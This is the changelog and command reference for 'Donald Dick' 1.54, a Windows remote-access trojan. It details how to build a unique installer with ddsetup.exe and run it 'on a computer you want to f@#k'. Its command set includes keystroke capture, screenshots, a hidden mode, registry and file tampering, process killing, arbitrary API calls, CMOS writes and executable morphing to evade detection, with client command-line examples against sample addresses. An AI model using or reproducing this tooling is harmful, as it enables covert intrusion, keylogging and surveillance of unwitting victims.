version 1.54: recent changes from 1.53a4:
new commands:
ATTRIB
FEEDBACK
SYSLOG
- we're no longer using predefined filenames
- dd system log can be emailed when server is up or crashed
- initial configuration is possible; just write required parameters
in ini file and run ddsetup.exe
- nethood bugfix
- password fix: now the same password must be specified in GUI and command
line clients; in options: password may be any length
- options may contain quoted substrings
- file attributes are preserved in uploads/downloads
note: in this version, jpeg compressor (jpegcomp.dll) is not installed
automatically; if you need this functionality, you should upload it
to destination host.
version 1.53a4: recent changes from 1.53a3 version:
new commands:
SHEXEC
NETHOOD
- NT: exe transformation fixed
- DIR command: file mask may be disabled for directories
version 1.53a3: recent changes from 1.53a2:
bugfix: high 2 bytes of spx network number were lost,
now network number is hex by default
Preliminary SmartMorph is used for executables (loaders are still defenceless)
Run ddsetup.exe, it will generate Donald Dick unique installable
file ddick.exe; run ddick.exe (you may rename it) on a computer you
want to f@#k and have fun.
version 1.53a2: recent changes from 1.53a1 version:
now, commands, that expect file names and paths, accept the following
constants (anywhere in the string):
::SYSDIR - windows system directory
::WINDIR - windows directory
::TMPDIR - temporary directory
::PRGDIR - program files directory
note that directories also contain drive
version 1.53a1: recent changes from 1.53a version:
new commands:
REGVAL1
FREAD
FWRITE
Command line parameters:
[...]
where
: 0 - SPX, 1 - TCP
: target taddress; TCP example: 127.0.0.1; SPX example: 22FA6700B
: port (socket); 0 - use default (23476 for TCP, 0x9014 for SPX)
: d=N, where N is delay before execution, ms
D=N, where N is delay after execution (has no meaning if repeat
count is unspecified or 1), ms
r=N, where N is repeat count (result is sent back for the last
executed command only)
p=X, where X is password
: see below
...: parameters if required
examples:
get info (no password is required):
client.exe 0 220482120A8 0 "" 0 info
client.exe 1 212.20.33.8 "" 0 info
upload file (no password is required):
client.exe 1 212.20.33.8 "" 0 upload "c:\program files\e.exe" e.exe
set binary value in the registry (no password is required):
client.exe 0 220482120A8 0 "" 0 setregbin hklm\system\aaa test F01456
set system colors (no password is required):
client.exe 0 220482120A8 0 "" 0 setcolors "2 3" "255 0 0 128 128 0"
open CDROM tray 10 times (assume that user will close it),
delay before execution 20 sec, after that - 120 s, no password is required
client.exe 0 220482120A8 0 "r=10 d=20000 D=120000" opencd
client will wait for reply of the last command, it is long - you may
ctrl-break it, the request will be executed anyway
Commands:
Server:
ECHO, FEEDBACK, HIDDEN, INFO, PORT, RAISE, REGISTER, SETPASS, SYSLOG,
TERMINATE, TESTFAR, TESTNEAR, UNINSTALL, UPGRADE
Chat:
CHATCLR, CHATRD, CHATRDNV, CHATSIZE, CHATWR, CHATWRNV
File system:
ATTRIB, CREATEDIR, DIR, DOWNLOAD, ERASE, FREAD, FWRITE, GETDRIVES, RCOPY,
REMOVEDIR, RENAME, SETFTEQ, SETFTIME, UPLOAD
Processes:
FORGETALL, GETPCLASS, GETPID, GETPROCLIST, GETSUSPTHR, GETTHRLIST, KILL,
KILLBYNAME, KILLTHR, RESUME, RESUMEALL, RUN, SETPCLASS, SHEXEC, SUSPEND
Registry:
REGDELK, REGDELV, REGKEY, REGNEWK, REGSETBIN,
REGSETDWORD, REGSETSZ, REGVAL, REGVAL1, REGSETVAL
System:
ANYCALL, GETTIME, LOGOFF, NETHOOD, POWEROFF, REBOOT, SETCOMPNAME, SETTIME,
SHUTDOWN, SPI, SYSINFO
Keyboard:
KEYBSAVE, KEYBUF, KEYMAP, KEYSTROKE
Windows:
CHILDWINDOWS, GETCOLORS, GETWINDOW, HWNDDESKTOP, MSGBOX, SCREENSHOT,
SETCAPTION, SETCOLORS, WINDOWS, WINMSG, WINSHOT
Hardware:
RDCMOS, WRCMOS
Jokes:
CLOSECD, MONOFF, MONON, OPENCD, PLAY
All:
ANYCALL
[ [...]]
-- not tested yet --
Call any function - very cool but dangerous.
Param may be immediate data (number or arrays) or may start with 'p';
in this case they are data and/or buffers which param points to.
If param contains only 'p' then pointer is NULL.
API function is called inside thread which processes the request.
Flags:
bit 0,1: 0 - use LoadLibrary( module name ),
GetProcAddress( function name) and perform near call,
1 - use offset (selector must be any value)
and perform near call,
2 - use selector, offset and perform far call.
bit 2: params push order, 0 - right->left (C), 1 - left->right (PASCAL)
if bits 4,5 are not zero then this bit is ignored.
bit 3: who removes params from the stack, 0 - caller, 1 - callee.
bit 4,5: register optimization (first params are passed in
register set):
0 - none,
n/i 1 - Watcom C, the set is EAX, EDX, EBX, ECX or EDX:EAX, ECX:EBX,
n/i 2 - Delphi, the set is EAX, EDX, ECX.
bit 6: how to pass return value buffer's address for arrays:
0 - Watcom C - address is passed in ESI
1 - Delphi, when register optimization is used - address is
passed in the last register in the set if parameters count
less than 3 or in the first position on the stack;
if no optimization is set in bits 4,5 then address
is passed in the first position on the stack
bit 8-31: buffer size to allocate on the stack for the return value;
if zero then return value is expected in EDX:EAX and bit 6
is ignored.
ATTRIB [] Clears chat room; if non-volatile
flag is nonzero then non-volatile
chat room is cleared
CHATRD [] Reads messages from chat room
starting with index or all of them
if index 0 or none;
message format:
index of message is incremented
continiuosly since first message
in chat the room even the room
was cleared
CHATRDNV [] same as CHATRD but operates with
non-volatile room
CHATSIZE [] Get/set chat room size, default
size is 8K; chat room is cleared
CHATWR [...] Add message(s) to the chat room
CHATWRNV [...] same as CHATWR but operates with
non-volatile room; non-volatile
chat room is limited to 2K
CHILDWINDOWS Get child windows of window
CLOSECD
CREATEDIR [...]
Note: returns as many result
strings as parameters passed.
DIR Don't forget file mask!
DOWNLOAD
ECHO Server sends received packet back
ERASE <> [...<>]
force flag: /0 or /1; /1 - erase
file even read only or directory
with all files and subdirectories.
Note: returns as many strings as
parameters passed.
FEEDBACK [ [ [ [ []]]]]
Set feedback parameters;
current parameters are always
returned
FORGETALL Clears suspended thread table
FREAD Reads data from file
FWRITE Writes data to file
GETCOLORS Get system colors
GETDRIVES Get list of drives
GETPCLASS Get priority class
GETPID Get server's process id
GETPROCLIST Get list of processes
GETSUSPTHR Get list of suspended threads in
the form:
GETTHRLIST Get list of threads for specified
process
GETTIME Returns date and time
GETWINDOW Returns window handle(s) relative
to the given window (see Win32 API
documentation on GetWindow()
for description)
HIDDEN <0/1> hidden mode on/off
in hidden mode server does not
reply on all commands if error
occured before their processing
(reception, password verification,
function code verification)
Returns current mode
HWNDDESKTOP Returns desktop window handle
INFO Returns some info
KEYBSAVE [<0/1>] not implemented without parameter or if that one
is nonzero, saves current lookup
table; if parameter is zero,
clears saved table
KEYBUF [ []] Returns captured scan codes;
if parameter is
absent then returns last keystrokes;
only the following scan codes are
captured: 02..1C, 1E..29, 2B..35,
37, 39, 47..53 and 9C, B5 - these
codes denote extended keys with
secondary scan codes 1C and 35
KEYMAP [ Remaps keys and return current map;
...] this command sets elements in
lookup table;
lookup table contains 256 scan codes in
range 0..127; first half of table is
used to remap regular keys, second one
is used to remap extended keys (those
keys produce two-byte scan codes, first
code is E0); normally,
elements at indexes 0 and 128 have
code 0, at 1 and 129 - 1 and so on;
key is disabled if code is 0;
note that it is impossible to remap
pause/break key
KEYSTROKE [...] simulates keystrokes
KILL [...]
Note: returns as many result
strings as parameters passed.
KILLBYNAME [...]
Note: returns as many result
strings as parameters passed.
KILLTHR [...]
Kills thread(s) (under Win95 may
not be done immediately)
Note: returns as many result
strings as thread ids passed.
LOGOFF Performs logoff for workstation
MONOFF Turns monitor off
MONON Turns monitor on
MSGBOX
Displays message box, see below
for the description of
NETHOOD network neighbourhood
OPENCD
PLAY
PORT GET/[...] Get or set port numbers in registry,
server must be restarted to
apply changes; protocol name
may be SPX or TCP; is
a number or D (default port)
always returns port numbers
POWEROFF Performs power off
RCOPY [...]
Note: returns result string for
each parameter pair.
RDCMOS Reads CMOS data, start - index in range 0..255
RAISE Raises an exception - for debug purposes only
REBOOT
REGDELK Deletes subkey from the registry
REGDELV Deletes value from subkey
REGISTER [] Registers server
Returns status in the first line,
registration info in the second line,
registration status in the third line
if registration data is present
REGKEY Displays subkeys in key
REGNEWK Creates new subkey
REGSETBIN Sets binary value, value
is the sequence of hex digits
without any spaces
REGSETDWORD Sets DWORD value
REGSETSZ Sets string value
REGSETVAL
Sets value of any type. Value
is the sequence of hex digits
without any spaces
REGVAL Key must contain "hklm","hkus",
"hkcu","hkcr" first
REGVAL1 Key must contain "hklm","hkus",
"hkcu","hkcr" first
REMOVEDIR [...]
Note: returns as many result
strings as parameters passed.
RENAME [...]
Note: returns result string for
each parameter pair.
RESUME [...]
Resumes thread(s)
Note: returns as many result
strings as thread ids passed.
RESUMEALL Resumes all suspended threads
RUN [...]
Note: returns as many result
strings as parameters passed.
SCREENSHOT [ [ [...]]]
SETCAPTION
SETCOLORS
SETCOMPNAME
SETFTEQU Sets date/time of file
equal to reference file
SETFTIME
SETPASS [] Sets or removes password
SETPCLASS Set priority class
SETTIME
SHEXEC
calls ShellExecuteEx
Flags allowed: SEE_MASK_CONNECTNETDRV,
SEE_MASK_DOENVSUBST,
SEE_MASK_FLAG_NO_UI
SHUTDOWN
SPI [] Get/set system parameters info
SUSPEND [...]
Suspends thread(s) (under Win95
may not be done immediately;
suspension means entering
continious loop so thread
consumes cpu power)
Note: returns as many result
strings as thread ids passed.
SYSINFO
SYSLOG [] Reads messages from dd system log
starting with index or all of them
if index 0 or none;
message format:
index of message is incremented
continiuosly
TERMINATE Server terminates itself
TESTFAR Returns far address of far test function - debug only
TESTNEAR Returns near address of near test function - debug only
UNINSTALL Completely uninstalls donald dick server
UPLOAD
UPGRADE restarts server anyway
WINDOWS Get window list
WINMSG
params may be numbers or may
start with 'p'; in this case
they are data and/or buffers
which lparam and/or wparam
points to
WINSHOT [ [ [...]]]
screenshot for the specified
window or for the foreground
window if handle is 0
WRCMOS
